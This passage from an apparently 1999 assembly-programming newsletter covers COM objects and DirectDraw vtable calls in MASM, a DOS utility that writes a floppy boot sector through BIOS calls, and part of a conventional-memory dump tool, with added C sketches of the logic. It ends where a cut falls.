GETOBJECTPOINTER Object, interface, pif
mov ebx, eax
mov eax, [val]
mov (Object ptr [ebx]).nValue, eax
ret
IInterface@SetValue endp
;-----------------------------------------------------------------------------
CreateObject proc uses ebx ecx pobj:DWORD
; set *pobj to 0
mov eax, pobj
mov dword ptr [eax], 0
; allocate object
invoke LocalAlloc, LMEM_FIXED, sizeof Object
or eax, eax
jnz @1
; alloc failed, so return
mov eax, E_OUTOFMEMORY
jmp return
@1:
mov ebx, eax
mov (Object ptr [ebx]).interface.lpVtbl, offset vtblIInterface
mov (Object ptr [ebx]).nRefCount, 0
mov (Object ptr [ebx]).nValue, 0
; Query the interface
lea ecx, (Object ptr [ebx]).interface
mov eax, (Object ptr [ebx]).interface.lpVtbl
invoke (IInterfaceVtbl ptr [eax]).QueryInterface,
ecx,
addr IID_IInterface,
[pobj]
cmp eax, S_OK
je return
; error in QueryInterface, so free memory
push eax
invoke LocalFree, ebx
pop eax
return:
ret
CreateObject endp
;-----------------------------------------------------------------------------
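IsEqualGUID proc uses esi edi rguid1:DWORD, rguid2:DWORD
cld
mov esi, [rguid1]
mov edi, [rguid2]
mov ecx, sizeof GUID / 4
; clear the result before the compare, because xor changes the flags
xor eax, eax
repe cmpsd
; ZF is set only if all four dwords matched. Testing ecx instead would
; also report a match when only the last dword differs.
setz al
ret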
IsEqualGUID endp
end start
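The GUID comparison that QueryInterface relies on can be sketched in C as below. The Guid type is a hypothetical stand-in for the Windows GUID structure, and guid_equal is an illustrative name, not the system's IsEqualGUID.

```c
#include <assert.h>
#include <string.h>

/* Hypothetical stand-in for the 16-byte Windows GUID structure. */
typedef struct Guid {
    unsigned int   data1;
    unsigned short data2;
    unsigned short data3;
    unsigned char  data4[8];
} Guid;

/* Returns 1 when every field matches, 0 otherwise. */
static int guid_equal(const Guid *a, const Guid *b)
{
    assert(a != NULL && b != NULL);
    return a->data1 == b->data1
        && a->data2 == b->data2
        && a->data3 == b->data3
        && memcmp(a->data4, b->data4, sizeof a->data4) == 0;
}
```

A difference in any position, including the very last byte, must make the comparison fail.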
Conclusion
------------------------------------------------------------------------------
We have (hopefully) seen how to implement a COM object. We can see that it
is a bit messy to do, and adds quite some overhead to our programs. However,
it can also add great flexibility and power to our programs.
Remember that COM defines only interfaces, and implementation is left to the
programmer. This article presents only one possible implementation. This is
not the only method, nor is it the best one. The reader should feel free to
experiment with other methods.
Copyright (C) 1999 Bill Tyler (billasm@...)
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::..........................................FEATURE.ARTICLE
How to use DirectDraw in ASM
by X-Calibre [Diamond]
Well, there has been quite a large demand for this essay, so I finally started
writing it. This essay will show you how to use C++ objects and COM interfaces
in Win32ASM, using DirectDraw as an example.
Well, in this part of the Win32 API, you will soon find out how important it
is to know C and C++ when you want to use an API written in these languages.
Judging from the demand for this essay, I think it will be necessary to
explain a bit of how objects work in C++. I will not go too deep, but only
show the things you need to know in Win32ASM.
What are objects really?
Actually a structure is an object of which all fields are public. We will look
at it the other way around. So the public fields in an object make up a
structure. The other fields in an object are private and are not reachable
from the outside. So they are not interesting to us.
A special thing about objects is that they can contain pointers to functions.
Normally, when using C or ASM, this would be possible, but a bit error-prone.
It can be seen as 'dirty' programming. That's why you probably haven't seen it
before.
When using C++ with a compiler, there will be no errors, as long as the
compiler does its job. So here you can use this technique with no chance of
errors, and it gives you some nice new programming options.
C++ goes even further with this 'structure of functions' idea. With
inheritance, you can also overwrite functions of the base class in the
inherited class. You can also create 'virtual' functions, which are defined in
the base class, but the actual code is only in inherited classes.
This is of course interesting for DirectX, where you want to have standard
functions, but with different code, depending on the hardware on which it is
running. So in DirectX, all functions are defined as virtual, and the base
class is inherited by hardware-specific drivers which supply hardware-specific
code. And the beauty of this is, that it's all transparent to the programmer.
The function pointers can change at runtime because of this system, so the C++
designers had to think of a way to keep the pointers to the functions
available to the program at all time.
What this all boils down to is that there is a table with pointers to the
functions. It's called the Virtual Function Table. I will call this the
vtable from now on.
So we need to get this table, in order to call functions from our object.
Lucky for you, Z-Nith has already made a C program to 'capture' the table,
and converted the resulting header file to an include file for use with MASM.
So I'll just explain how you should use this table, and you can get going
soon.
Well, actually it's quite simple. The DirectX objects are defined like this:
IDirectDraw STRUC
lpVtbl DWORD ?
IDirectDraw ENDS
IDirectDrawPalette STRUC
lpVtbl DWORD ?
IDirectDrawPalette ENDS
IDirectDrawClipper STRUC
lpVtbl DWORD ?
IDirectDrawClipper ENDS
IDirectDrawSurface STRUC
lpVtbl DWORD ?
IDirectDrawSurface ENDS
So these structs are actually just a pointer to the vtables, and don't contain
any other values. Well, this makes it all very easy for us then.
I'll give you a small example:
Say we have an IDirectDraw object called lpDD. And we want to call the
RestoreDisplayMode function.
Then we need to do 2 things:
1. Get the vtable.
2. Get the address of the function, using the vtable.
The first part is simple. All the struct contains, is the pointer to the
vtable. So we can just do this:
mov eax, [lpDD]
mov eax, [eax]
Simple, isn't it? And the next part isn't really much harder. The vtable is
put into a structure called IDirectDrawVtbl in DDRAW.INC. We now have the
address of the structure in eax. All we have to do now, is get the correct
member of that structure, to get the address of the function we want to call.
You would have guessed by now, that this will do the trick:
call [IDirectDrawVtbl.RestoreDisplayMode][eax]
That is not a bad guess...
But there's one more thing, which is very important: this function needs to be
invoked on the IDirectDraw object. We may only see the vtable in the structure,
but there are also private members inside the object. So there's more than
meets the eye here. What it comes down to is that the call needs the object
as an argument. And this will be done by stack as always. So we just need to
push lpDD before we call. The complete call will look like this:
push [lpDD]
call [IDirectDrawVtbl.RestoreDisplayMode][eax]
Simple, was it not? And calls with arguments are not much harder.
Let's set the displaymode to 320x200 in 32 bits next.
This call requires 3 arguments:
SetDisplayMode( width, height, bpp );
Well, the extra arguments work just like normal API calls: just push them onto
the stack in backward order.
So it will look like this:
push 32
push 200
push 320
mov eax, [lpDD]
push eax
mov eax, [eax]
call [IDirectDrawVtbl.SetDisplayMode][eax]
And that's all there is to it.
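Seen from C, the two calls above are ordinary calls through a table of function pointers, with the object passed as the first argument. The sketch below uses a mock object with made-up names (MockDraw, MockDrawVtbl, mock_init); it is not the real IDirectDraw interface, which has many more entries and uses the stdcall convention.

```c
#include <assert.h>
#include <stddef.h>

typedef struct MockDraw MockDraw;

/* Hypothetical two-entry vtable; the real one is much larger. */
typedef struct MockDrawVtbl {
    long (*RestoreDisplayMode)(MockDraw *self);
    long (*SetDisplayMode)(MockDraw *self, unsigned w, unsigned h, unsigned bpp);
} MockDrawVtbl;

struct MockDraw {
    const MockDrawVtbl *lpVtbl;   /* the only member the caller relies on */
    unsigned width, height, bpp;  /* "private" state behind the interface */
};

static long mock_restore(MockDraw *self)
{
    self->width = self->height = self->bpp = 0;
    return 0;
}

static long mock_set(MockDraw *self, unsigned w, unsigned h, unsigned bpp)
{
    self->width = w;
    self->height = h;
    self->bpp = bpp;
    return 0;
}

static const MockDrawVtbl mock_vtbl = { mock_restore, mock_set };

/* Point the object at its vtable and clear its state. */
static void mock_init(MockDraw *d)
{
    assert(d != NULL);
    d->lpVtbl = &mock_vtbl;
    d->width = d->height = d->bpp = 0;
}
```

With a pointer lpDD to such an object, the call reads lpDD->lpVtbl->SetDisplayMode(lpDD, 320, 200, 32): fetch the vtable, pick the entry, pass the object first.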
To make life easier, we have included some MASM macros in DDRAW.INC, for use
with the IDirectDraw and IDirectDrawSurface objects:
DDINVOKE MACRO func, this, arglist :VARARG
mov eax, [this]
mov eax, [eax]
IFB <arglist>
INVOKE [IDirectDrawVtbl. func][eax], this
ELSE
INVOKE [IDirectDrawVtbl. func][eax], this, arglist
ENDIF
ENDM
DDSINVOKE MACRO func, this, arglist :VARARG
mov eax, [this]
mov eax, [eax]
IFB <arglist>
INVOKE [IDirectDrawSurfaceVtbl. func][eax], this
ELSE
INVOKE [IDirectDrawSurfaceVtbl. func][eax], this, arglist
ENDIF
ENDM
With these macros, our 2 example calls will look as simple as this:
DDINVOKE RestoreDisplayMode, lpDD
DDINVOKE SetDisplayMode, lpDD, 320, 200, 32
Well, that's basically all there is to know about using objects, COM and
DirectX in Win32ASM. Have fun with it!
And remember:
C and C++ knowledge is power!
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Writing Boot Sectors To Disk
by Jan Verhoeven
Introduction.
-------------
In my previous article I showed how to make a private non-bootable
bootsector for 1.44 Mb floppy disks. Unfortunately, there was no way yet to
write that non-bootsector to a floppy disk....
Enter this code. It is the accompanying bootsector writer for floppy disks.
It assumes that your A: drive is the 1.44 Mb floppy disk drive and I dare
say that this will be true in the majority of cases.
The assembler used
------------------
As usual, I have written this code in A86 format. Until now, not many
aspects of the A86 extensions have been used, but, believe me, in future
articles this will be done.
A86 is particularly useful for people that make syntax errors. It will
insert the error messages into the source file so that you can easily find
them. In the next assembler run the error messages are removed again.
To fully use this aspect of A86 programming, I made a small batchfile that
will let me choose between several options while writing the code. Below
you can see the file. After an error, I choose to go back into the editor.
When there are no errors, I might decide to do a trial run. Or to quit to
DOS.
This is all done by means of the WACHT command which waits for a keypress.
It returns (in errorlevel) the indexed position in the command tail table
of the key which was pressed.
Rapid assembly prototyping.
---------------------------
For easy processing and running sourcefiles I use a small batchfile, which
looks like:
----------- Run.Bat --------------------------------------- Start ---------
@echo off
if "%1" == "" goto leave
:start
ed %1.a86
a86 %1.a86 %2 %3 %4 %5 %6
:menu
Echo *
Echo Options:
Echo *Escape = stop
Echo * L = LIST
echo * ;-() = back to the editor
echo * space = test-run of %1.com
echo *Period = debugger-run with %1.com/sym
wacht .\=-[]';-()/":?><{}|+_LCE
if errorlevel 27 goto start
if errorlevel 26 goto screen
if errorlevel 25 goto list
if errorlevel 4 goto start
if errorlevel 3 goto debugger
if errorlevel 2 goto execute
if errorlevel 1 exit
goto menu
:execute
%1
if errorlevel 9 echo Errorlevel = 9+
if errorlevel 8 echo Errorlevel = 8
if errorlevel 7 echo Errorlevel = 7
if errorlevel 6 echo Errorlevel = 6
if errorlevel 5 echo Errorlevel = 5
if errorlevel 4 echo Errorlevel = 4
if errorlevel 3 echo Errorlevel = 3
if errorlevel 2 echo Errorlevel = 2
if errorlevel 1 echo Errorlevel = 1
goto menu
:debugger
vgamode 3
d86 %1
goto menu
:list
list
goto menu
:screen
vgamode 3
goto menu
:leave
echo No file specified
----------- Run.Bat ---------------------------------------- End ----------
This BAT file relies heavily on my computer system. For one, I use DR-DOS 6
which means that I can use the EXIT word to get out of a Batchfile.
Also, I switch videomodes back to Mode 3 with "Vgamode 3" and you will have
to use another command for that, like "Mode co80" or the utility
that came with your videocard.
The program "List" is Vernon Buerg's file lister which I use to track down
errors in all kinds of files.
How to write a sector to disk.
------------------------------
Globally there are three methods. The first would be to program the floppy
disk controller, but that is just downright difficult. A second approach
would be to use INT 026, the way DOS does things.
I chose the BIOS method. For non-partitioned disk structures this is the
easiest way. Just select track, head and sector and write data to the sectors
on that disk.
The bootsector is the very first sector on a disk. For a floppy disk this
boils down to track 0, head 0 and sector 1 (sectors are counted from 1, not
from 0!).
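To see why track 0, head 0, sector 1 is "the very first sector", it helps to number the sectors linearly. The sketch below assumes the standard 1.44 MB geometry (80 tracks, 2 heads, 18 sectors per track); chs_to_lba is an illustrative name and is not used by the program that follows.

```c
#include <assert.h>

/* Geometry of a 1.44 MB floppy: 80 tracks, 2 heads, 18 sectors per track. */
enum { FLOPPY_HEADS = 2, FLOPPY_SECTORS_PER_TRACK = 18 };

/* Convert track/head/sector to a zero-based linear sector number.
   Sectors count from 1, tracks and heads from 0. */
static unsigned long chs_to_lba(unsigned track, unsigned head, unsigned sector)
{
    assert(sector >= 1 && sector <= FLOPPY_SECTORS_PER_TRACK);
    assert(head < FLOPPY_HEADS);
    return ((unsigned long)track * FLOPPY_HEADS + head)
               * FLOPPY_SECTORS_PER_TRACK
           + (sector - 1);
}
```

The bootsector comes out as linear sector 0, and the last sector of the disk (track 79, head 1, sector 18) as 2879.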
The code is very straightforward. What it does is:
- reset disk drive controller
- open the file to transfer to the bootsector
- read file into internal buffer
- close the file
- repeat 5 times:
- try to transfer buffer to bootsector of drive A:
- shut down and return to DOS.
- if an error occurs, the user is informed about it.
That's all there is to it.
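The "repeat 5 times" step is the only part with real control flow, so here is a hedged C sketch of it. The writer is passed in as a callback (sector_writer, a hypothetical type) so the loop can be tried without touching a disk; flaky_writer is a test double, not a BIOS call.

```c
#include <assert.h>
#include <stddef.h>

enum { SECTOR_SIZE = 512, MAX_ATTEMPTS = 5 };

/* Hypothetical writer callback: returns 0 on success, non-zero on error. */
typedef int (*sector_writer)(const unsigned char *buf, size_t len, void *ctx);

/* Returns the number of attempts used (1..5), or 0 if every attempt failed. */
static int write_with_retries(sector_writer write_fn,
                              const unsigned char *buf, void *ctx)
{
    int attempt;

    assert(write_fn != NULL && buf != NULL);
    for (attempt = 1; attempt <= MAX_ATTEMPTS; attempt++) {
        if (write_fn(buf, SECTOR_SIZE, ctx) == 0)
            return attempt;          /* success: stop retrying */
    }
    return 0;                        /* all attempts failed */
}

/* Test double: fails a configurable number of times, then succeeds. */
static int flaky_writer(const unsigned char *buf, size_t len, void *ctx)
{
    int *failures_left = ctx;

    (void)buf;
    if (len != SECTOR_SIZE)
        return -1;
    if (*failures_left > 0) {
        (*failures_left)--;
        return -1;
    }
    return 0;
}
```

The point to carry over to the assembly version is that the success/failure decision must come from the write itself, not from whatever happened to run in between.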
The Source.
-----------
Below is the source code for this short utility. I have commented just
about every line I thought needed it.
----------- Wrs.A86 --------------------------------------- Start ---------
name wrs
title WRite Sector
page 80, 120
stdout = 1 ; the "standard" equates
lf = 10
cr = 13
DATA segment ; define the volatile data area
buffer db 512 dup (?) ; this is enough for one sector
EVEN ; make sure WORD starts at an even address
Handle dw ? ; handle number of file to write
; ----------------------
CODE segment ; start of the actual code
; no ORG, so we start at offset 0100
jmp main ; jump forward to entry point
db 'VeRsIoN=0.2', 0
db 'CoPyRiGhT=CopyLeft 1999, Jan Verhoeven, '
db 'jverhoeven@...', 0
; ----------------------
filename db 'BootLoad.bin', 0 ; name of file to send to disk
Mess001 db 'Cannot open file BootLoad.bin. '
db 'Operation aborted.', cr, lf
Len001 = $ - Mess001
Mess002 db 'Something went wrong while writing to disk.', cr, lf
Len002 = $ - Mess002
Mess003 db 'The floppy disk subsystem reported an error. '
db 'Trying once more.', cr, lf
Len003 = $ - Mess003
Mess004 db cr, lf, 'Bootsector written. '
db 'Thank you for using this software.'
db cr, lf, 'This program is GNU GPL free software and you use '
db 'it at your own risk.'
db cr, lf, 'Please study the GNU '
db 'General Public License for more details.', cr, lf
Len004 = $ - Mess004
; ----------------------
Error1: mov dx, offset mess001 ; process "cannot open file"
mov cx, len001
mov bx, stdout
mov ah, 040
int 021 ; print via DOS
mov ax, 04C01 ; exit with errorcode = 1
int 021
; ----------------------
Error2: mov dx, offset mess002 ; process "disk error"
mov cx, len002
mov bx, stdout
mov ah, 040
int 021 ; via DOS
mov ax, 04C02 ; exit with errorcode = 2
int 021
; ----------------------
Error2a: push ax, bx, cx, dx ; process "Disk not ready"
mov dx, offset mess003 ; point to message
mov cx, len003 ; this many bytes
mov bx, stdout ; to the console
mov ah, 040 ; do a write
int 021 ; via DOS
pop dx, cx, bx, ax ; restore state of machine
ret ; and return to caller
; ----------------------
main: mov dl, 0 ; choose drive A:
mov ah, 0 ; select function 0 ...
int 013 ; ... reset diskdrives
mov dx, offset filename ; point to name of file
mov ax, 03D00 ; to open
int 021 ; via DOS
jc Error1 ; if error, take action
mov [Handle], ax ; no error, => ax = handle
mov dx, offset buffer ; setup pointer, ...
mov cx, 512 ; ... byte count, ...
mov bx, ax ; ... and handle
mov ah, 03F ; to read data from file
int 021 ; via DOS
mov bx, [Handle]
mov ah, 03E
int 021 ; close this file
mov cx, 5 ; prepare for a five times LOOP
L0: push cx
mov bx, offset buffer
mov es, ds ; es:bx = buffer to read from
mov dx, 0000 ; drive A:, head 0
mov cx, 0001 ; Track 0, Sector 1
mov ax, 0301 ; Write sectors, 1 sector
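int 013 ; via BIOS
pop cx ; restore loop counter (POP leaves the flags alone)
jnc >L1 ; if no error, jump forward
call error2a ; Houston, we have an error! Inform the user
loop L0 ; and try again
jmp error2 ; after five times still no go (the carry from INT 013
; is no longer valid here: error2a called DOS in between)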
L1: mov dx, offset Mess004 ; Signal that we're successful
mov cx, Len004
mov bx, stdout ; to the console
mov ah, 040
int 021 ; via DOS (so it can be redirected)
mov ax, 04C00 ; mention that there were no errors
int 021 ; and return to DOS
----------- Wrs.A86 ---------------------------------------- End ----------
Have fun experimenting with bootsectors. But take care that this will NOT
work on a hard disk.
Hard disk structure.
--------------------
A hard disk uses another layout for its structure. The very first sector
of a HDD is the MBR (Master BootRecord). It is the only sensible sector in
the first track of a normal HDD. The rest is just empty.
Partitions start at a track or cylinder boundary. With the usual DOS layout
the first one starts at cylinder 0, head 1, sector 1, directly after that
first track. The very first sector of a bootable partition is the bootsector.
The MBR contains the partition table, indicating where partitions start and
end and whether they are bootable or not. Plus some code to interpret that
table and to find the bootsector that was selected.
If you write a floppy disk bootsector to the very first sector of a HDD,
you wipe out the MBR and hence make all data on that disk inaccessible. The
data will still be there, but the system will no longer be able to find
or use it.
So please take care that this software is NOT used for drive (DL=) 080.
jverhoeven@...
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Dumping Memory To Disk
by Jan Verhoeven
This piece of code allows you to make a memory dump of any region of
conventional memory (i.e. below 1 Mb) to a diskfile.
The program itself.
-------------------
The source is documented so it speaks for itself. At points of
interest I have inserted "break" and "restart" lines with space for
additional remarks.
So just read the source and read the remarks. This way, the text is
where the code is, and you don't need to go back and forth in the
text. I think this will be easier to read than explanation afterwards.
--- Mem2File ------------------------------------------------- Start ---
name mem2file
title Send an area of memory to a diskfile.
page 80, 120
; version 1.0 : Had to be compiled for each area/filename OK: 01-01-1991
; version 1.1 : Same as above, for A86 format OK: 01-01-1999
; version 1.2 : Make it commandline driven OK: 01-02-1999
; version 1.3 : Make it reliable OK: 02-02-1999
; ----------------------
stdout = 1
tab = 9
lf = 10
cr = 13
clr MACRO ; macro called CLeaR
mov #1, 0 ; move it with zero
#EM ; and get outa here
Dum1 STRUC ; a structure definition
OffVal dw ?
SegVal dw ?
ENDS
; ----------------------
DATA segment ; this is where the volatile data lives
ByteF = $
dummy db ? ; just to fool D86....
; if this dummy variable is not here, D86 will
; reference variable "Start" as "ByteF".
even
Start dw ?, ? ; segment:address to start
Stop dw ?, ? ; segment:address to stop
Blocks dw ? ; number of 16K chunks to save
Rest dw ? ; remaining part to save
ArgNum dw ? ; nr of bytes in this argument
OldClp dw ? ; current pointer into command line
Handle dw ?
Length dw ?, ?
FileName: ; this storage is used twice....
Argument db 80 dup (?) ; storage for next argument from command-line
Output db 16K dup (?) ; buffered output
--- Mem2File ------------------------------------------------- Break ---
An A86 enhancement: if you need 16K elements of data, just ask for it.
No need to remember that 16 Kb is 16,384 bytes. The "K" will do.
No big deal, just a nice feature.
Also, if you need to process large binary numbers you may group them
into sub-units separated by underscores. So the number:
1000100100111101
is hard to read back. But if we insert "_" markers like:
1000_1001_0011_1101
the grouping of bits makes them easier to understand. Not that it is a
matter of life and death, but it can come in handy once in a while.
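The Start, Stop, Blocks and Rest variables declared above hint at the arithmetic involved: turn two segment:offset pairs into linear addresses, then split the distance into 16K blocks plus a remainder. The C sketch below shows that arithmetic only; the function names are made up, and treating Stop as the first byte NOT dumped is an assumption, not something the listing states.

```c
#include <assert.h>

enum { BLOCK_SIZE = 16 * 1024 };

typedef struct DumpPlan {
    unsigned long blocks;  /* number of full 16K blocks */
    unsigned long rest;    /* bytes left over after the full blocks */
} DumpPlan;

/* Real-mode address: segment * 16 + offset. */
static unsigned long linear_address(unsigned segment, unsigned offset)
{
    assert(segment <= 0xFFFFu && offset <= 0xFFFFu);
    return ((unsigned long)segment << 4) + offset;
}

/* Split the region [start, stop) into 16K blocks and a remainder.
   (Half-open range is an assumption made for this sketch.) */
static DumpPlan plan_dump(unsigned long start, unsigned long stop)
{
    DumpPlan plan = {0, 0};

    if (stop > start) {
        unsigned long length = stop - start;
        plan.blocks = length / BLOCK_SIZE;
        plan.rest = length % BLOCK_SIZE;
    }
    return plan;
}
```

For example, B800:0000 is linear address 0B8000, and a 40000-byte region splits into two full blocks plus 7232 bytes.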
--- Mem2File ------------------------------------------------ Restart --
Bytes = $ - ByteF ; number of volatile databytes
; ----------------------
CODE segment ; no ORG, so we start at 0100
jmp main
HexTable db '0123456789ABCDEF', 0
db 'VeRsIoN=Mem2File 1.3', 0
db 'CoPyRiGhT=CopyLeft Jan Verhoeven, jverhoeven@...', 0
Mess001 db 'Mem2File collects a part of conventional memory and '
db 'sends it to a file.', cr, lf, lf
db 'The syntax is:', cr, lf, lf
db tab, 'Mem2File segm1:offs1 [-] segm2:offs2 '
db '<path>file.ext.', cr, lf, lf
db 'Mem2File is GNU GPL style FREE software. ', cr, lf
db 'Please read the GNU GPL if you are in doubt.', cr, lf, lf
Mess002 db 'Mem2File was made by Jan Verhoeven, NL-5012 GH 272, '
db 'The Netherlands', cr, lf
db 'E-mail address : jverhoeven@...', cr, lf, lf
Len001 = $ - Mess001
Len002 = $ - Mess002
Mess004 db 7, 'Error! All numbers are expected to be hexadecimal.'
db cr, lf
Len004 = $ - Mess004
;------------------------
InitMem: mov di, ByteF ; Init volatile memory with zero's.
mov cx, Bytes ; saves a lot of strange problems.
mov al, 0
rep stosb
ret
;------------------------
--- Mem2File ------------------------------------------------- Break ---
I use volatile data to store data that does not need initialising. This
saves a lot of diskspace and it loads a lot faster. Drawback of volatile
data can be that any rubbish left there by other programs can make your
software go berserk if you yourself forget to initialise the data.
Therefore I -always- prime the volatile data memory with zeros. Just to
have a well defined starting position.
It should not be necessary, but, on the other hand, how much overhead
and extra execution time is such an initialisation routine?
--- Mem2File ------------------------------------------------ Restart --
L0: mov b [di], 0 ; terminate argument string
mov [OldClp], si ; done, => clean up.
clc ; indicate "No Error"
L3: pop di, si, ax ; restore registers, ...
ret ; ... and leave.
GetArg: push ax, si, di ; get next argument from command-line in ASCIIZ format
mov si, [OldClp] ; now, where did we leave last time?
cmp si, 0 ; Have we ever used this routine?
IF E mov si, 081 ; if not, prime SI, ...
mov di, offset Argument ; ... DI and ...
mov [ArgNum], 0 ; ... nr of chars in argument.
L1: lodsb ; get byte
cmp al, ' ' ; skip over spaces, ...
je L1
cmp al, tab ; ... and tabs.
je L1
cmp al, 1 ; ONLY if AL is 0, we get a carry
jc L3 ; if CARRY, we're done
--- Mem2File ------------------------------------------------- Break ---
This construction is what I particularly like. I want to check if AL is
Zero. Normally you can code
cmp al, 0
jz L3
but L3 is the error-exit and needs the carrybit to be set as an error
flag. Normally you would enter a
stc
instruction to fulfil the specification. But that is poor programming.
It is better to let the software do this for us.
AL can have any value between 020 and 0FF, plus 00, tab, lf and cr. 01
is not an option. So the sequence
cmp al, 1 ; ONLY if AL is 0, we get a carry
jc L3 ; if CARRY, we're done
will send us to the errorexit WITH the carryflag set, all in one,
without explicitly having to set the carry flag.
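The trick rests on one fact: after "cmp al, 1" the carry flag is the borrow of the unsigned subtraction, so it is set exactly when AL is below 1, which for a byte means AL is 0. A small C model of that (the function names are illustrative):

```c
#include <assert.h>

/* Carry after "cmp al, imm" is the borrow of the unsigned subtraction. */
static int carry_after_cmp(unsigned char al, unsigned char imm)
{
    return al < imm;
}

/* Count how many of the 256 byte values produce a carry for a given imm. */
static int count_values_with_carry(unsigned char imm)
{
    int count = 0;
    unsigned value;

    for (value = 0; value <= 0xFF; value++)
        count += carry_after_cmp((unsigned char)value, imm);
    return count;
}
```

Only one byte value out of 256 sets the carry when comparing against 1, so the single CMP both detects the terminating zero and raises the error flag.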
--- Mem2File ------------------------------------------------ Restart --
L2: stosb ; else store char in Arguments array
inc [ArgNum] ; adjust counter
lodsb ; and get next char
cmp al, ' ' ; is it a delimiting space?
je L0
cmp al, tab ; or a tab?
je L0
cmp al, ':' ; or a colon?
je L0
cmp al, 0 ; or an end-of-line?
jne L2 ; if not, loop back,
mov si, 0FFFF ; else make SI ridiculously high, ...
stc ; ... set carry flag, ...
jmp L0 ; and get out.
--- Mem2File ------------------------------------------------- Break ---
Ok, ok, ok. I was influenced to make this function by a compiler. No, it
wasn't C. It was Modula-2.
GetArg (if necessary A86 can operate in a case sensitive mode!) extracts
the next argument from the command tail. It puts it in a separate buffer
at address "Argument" which can hold 80 bytes. Should be more than
enough for one word or expression.
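For comparison, here is roughly what GetArg does, written as a C sketch: skip blanks and tabs, copy characters until a blank, tab, colon or end of string, and remember where to continue. The name next_arg and its signature are assumptions made for illustration; unlike the assembly routine it keeps its position in a caller-supplied cursor and guards the buffer length.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Copy the next argument from *cursor into out (NUL-terminated).
   Returns 1 if an argument was found, 0 if the tail is exhausted. */
static int next_arg(const char **cursor, char *out, size_t out_size)
{
    const char *p;
    size_t n = 0;

    assert(cursor != NULL && *cursor != NULL && out != NULL && out_size > 0);
    p = *cursor;

    while (*p == ' ' || *p == '\t')      /* skip leading blanks and tabs */
        p++;
    if (*p == '\0') {                    /* nothing left */
        out[0] = '\0';
        *cursor = p;
        return 0;
    }
    do {                                 /* first character is always stored */
        if (n + 1 < out_size)
            out[n++] = *p;
        p++;
    } while (*p != '\0' && *p != ' ' && *p != '\t' && *p != ':');

    out[n] = '\0';
    if (*p != '\0')
        p++;                             /* step over the delimiter */
    *cursor = p;
    return 1;
}
```

Because the colon is a delimiter, "B800:0000" comes back as two arguments, segment first and offset second.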
--- Mem2File ------------------------------------------------ Restart --
;------------------------
L1: stc ; byte not in table!
pop dx ; we came here with carry set!
ret ; exit
L2: sub bx, dx ; calculate position in table
pop dx
clc ; make sure carry is cleared
ret
--- Mem2File ------------------------------------------------- Break ---
This is a typical A86 construction. The subroutine is called TableFind
and it starts in the next line and ends in the previous one!
This is done to have the local labels declared for when they are needed
in the main functionbody. All jumps are "backward". For the CPU there's
no big influence, but for the assembler there is. No guessing about
labels.
--- Mem2File ------------------------------------------------ Restart --
TableFind: ; find AL in ASCIIZ table [BX] ...
push dx ; ... and report position
mov dx, bx ; keep start of table (the original BX)
L0: cmp b [bx], 0 ; is it end of table?
je L1 ; if so, jump out
cmp al, [bx] ; compare byte with table
je L2 ; if same, jump out
inc bx ; else increment pointer
jmp L0 ; and loop back
;------------------------
MakeUpper:
cmp al, 'a' ; too low?
jb ret
--- Mem2File ------------------------------------------------- Break ---
An A86 enhancement: a conditional return instruction. All sensible CPU's
have conditional CALL and RET instructions. Not the 80x86 line. This CPU
was meant to be structured.
So you have to put a conditional jump before the call, and introduce yet
another silly labelname for the next instruction.
The "Jcc ret" is a good way to circumvent this omission. What it
does is the same as what, on a Z-80, would be done with a "RET cc"
instruction.
There is one catch, however: there must be a RET instruction within
reach PRIOR to the "Jcc Ret" (internal) macro.
If that is a problem, you could also use the line:
IF cc Ret
So either way you, the programmer, win.
--- Mem2File ------------------------------------------------ Restart --
cmp al, 'z' ; if in range, ...
ja ret
and al, not bit 5 ; ... make uppercase
--- Mem2File ------------------------------------------------- Break ---
A86 is very programmer-oriented and allows us to write down what and how
we think. So if I need to set bit 0 of register Ax, I will simply write
or ax, bit 0
Any value between 0 and 15 is valid in A86 (0 - 31 for A386) to refer to
the respective bit in the respective source.
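In C the same "bit n" idea is usually spelled as a shift. The sketch below mirrors MakeUpper under the assumption of ASCII, where upper and lower case letters differ only in bit 5; BIT and make_upper are illustrative names.

```c
#include <assert.h>

/* Mask with only bit n set, like A86's "bit n" operator. */
#define BIT(n) (1u << (n))

/* Convert 'a'..'z' to upper case by clearing bit 5; leave the rest alone. */
static unsigned char make_upper(unsigned char c)
{
    if (c < 'a' || c > 'z')
        return c;
    return (unsigned char)(c & ~BIT(5));
}
```

The range check matters: clearing bit 5 blindly would also change characters such as '{' or the digits.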
--- Mem2File ------------------------------------------------ Restart --
ret
;------------------------
BadNumber: ; hey typo, you made a dumbo!
mov dx, offset Mess004
mov cx, Len004
mov bx, StdOut
mov ah, 040
int 021
mov ax, 04C02 ; and exit with errorcode 2
int 021
;------------------------
SyntErr: mov dx, offset Mess001
mov cx, Len001
mov bx, StdOut
mov ah, 040 ; print out "help" screen and ...
int 021
mov ax, 04C01 ; ... exit with errorcode 1
int 021
;------------------------
L8: mov ax, dx ; Convert has result in DX, that's why.
pop dx, bx
ret
Convert: push bx, dx ; convert ASCII to Hex.
mov si, offset Argument
clr dx ; dx will contain result
--- Mem2File ------------------------------------------------- Break ---
Here the macro is invoked. It is used to load the DX register with
zero. If later you decide to change the way in which you want to clear
registers, just change the macro.
In LST files (the assembler listings) the expansions are controlled by
means of the +L switch. If you issue the option "+L35" macro's will not
be expanded in the listings file.
--- Mem2File ------------------------------------------------ Restart --
L1: lodsb ; get first character
cmp al, 0 ; end of string?
je L8
call MakeUpper ; if not, make uppercase
mov bx, offset HexTable
call TableFind ; and lookup in table
jc BadNumber
shl dx, 4 ; multiply DX by 16
--- Mem2File ------------------------------------------------- Break ---
This is another A86 goody. I coded a "SHL DX, 4" instruction, although
I do not know what the target processor will be.
No problem with A86. It finds out which CPU you are assembling on and
targets that. If your CPU supports this instruction, it is assembled as
such. If it doesn't, the instruction is expanded as a macro into the
following:
shl dx, 1
shl dx, 1
shl dx, 1
shl dx, 1
More code in the executable, but it makes programming easier.
If on a modern CPU, you can force A86 to act as if the CPU were a
vintage 88 with the commandline switch +P65.
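To see what the Convert loop computes, here is a rough Python model of it.
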